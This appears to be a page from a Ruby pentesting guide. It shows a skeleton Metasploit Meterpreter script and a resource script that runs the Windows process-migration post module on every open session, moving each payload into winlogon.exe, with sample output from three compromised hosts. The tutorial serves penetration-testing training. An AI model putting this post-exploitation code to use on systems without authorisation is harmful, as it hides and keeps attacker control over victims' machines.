Meterpreter Scripting

Since the Meterpreter scripting is planned to be removed and replaced with POST module, we'll put a skeleton Meterpreter script only.

You can locate you new Meterpreter script in

  • The framework it-self metasploit-framework/scripts/meterpreter or,

  • In your Metasploit user's path ~/.msf/scripts/meterpreter

Absolute Meterpreter Script

# $Id$
# $Revision$
# Author: 
#-------------------------------------------------------------------------------
################## Variable Declarations ##################

@client = client
sample_option_var = nil
@exec_opts = Rex::Parser::Arguments.new(
    "-h" => [ false, "Help menu." ],
    "-o" => [ true , "Option that requires a value"]
    )
meter_type = client.platform

################## Function Declarations ##################

# Usage Message Function
#-------------------------------------------------------------------------------
def usage
    print_line "Meterpreter Script for INSERT PURPOSE."
    print_line(@exec_opts.usage)
    raise Rex::Script::Completed
end

# Wrong Meterpreter Version Message Function
#-------------------------------------------------------------------------------
def wrong_meter_version(meter = meter_type)
    print_error("#{meter} version of Meterpreter is not supported with this Script!")
    raise Rex::Script::Completed
end

################## Main ##################
@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-h"
        usage
    when "-o"
        sample_option_var = val
    end
}

# Check for Version of Meterpreter
wrong_meter_version(meter_type) if meter_type !~ /win32|win64|java|php|linux/i # Remove none supported versions

The script is directly quoted from the Metasploit samples

Run Process migration on multiple meterpreter sessions

From `msfconsole` and after getting all metherpreter sessions, go to post/windows/manage/migrate

use post/windows/manage/migrate

Note: make sure you've the sufficient privileges to migrate to the designated processe

Then create a file with rc extension including the <ruby> </ruby> tages

mass-mirgation.rc

<ruby>
# Find PID by name
def find_pid(session_num, session, process)
  print_status("Session #{session_num} | Finding PID of processe #{process}")
    session.sys.process.get_processes().each do |x|
    proc_name, proc_id = x['name'].downcase, x['pid']

    return proc_id if proc_name == process.downcase
  end
end

process = 'winlogon.exe'
framework.sessions.each do |num,session|
  run_single("set PID #{find_pid(num, session, process)}")
  run_single("set SESSION #{num}")
  print_status("Running #{active_module.fullname} against session #{num}")
  run_single("run -j")
  sleep 1
end
</ruby>

Now, from msfconsole,

resource /home/rubyfu/mass-migration.rc

Result will be similar to

[*] Running post/windows/manage/migrate against session 2
[*] Post module running as background job

[*] Running module against WIN-NG118S6TM0H
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate to
[*] Session 2 | Finding PID of processe winlogon.exe
[+] Migrating to 3628
SESSION => 3
[*] Running post/windows/manage/migrate against session 3
[*] Post module running as background job
[*] Running module against HOME
[*] Current server process: shell.exe (2684)
[*] Session 3 | Finding PID of processe winlogon.exe
[+] Migrating to 2444
SESSION => 4
[*] Running post/windows/manage/migrate against session 4
[*] Post module running as background job
[*] Running module against WIN-8H4IDI0SR5A
[*] Current server process: shell.exe (2996)
[*] Session 4 | Finding PID of processe winlogon.exe
[+] Migrating to 2240

[+] Successfully migrated to process 3628
[+] Successfully migrated to process 2444
[+] Successfully migrated to process 2240

Last updated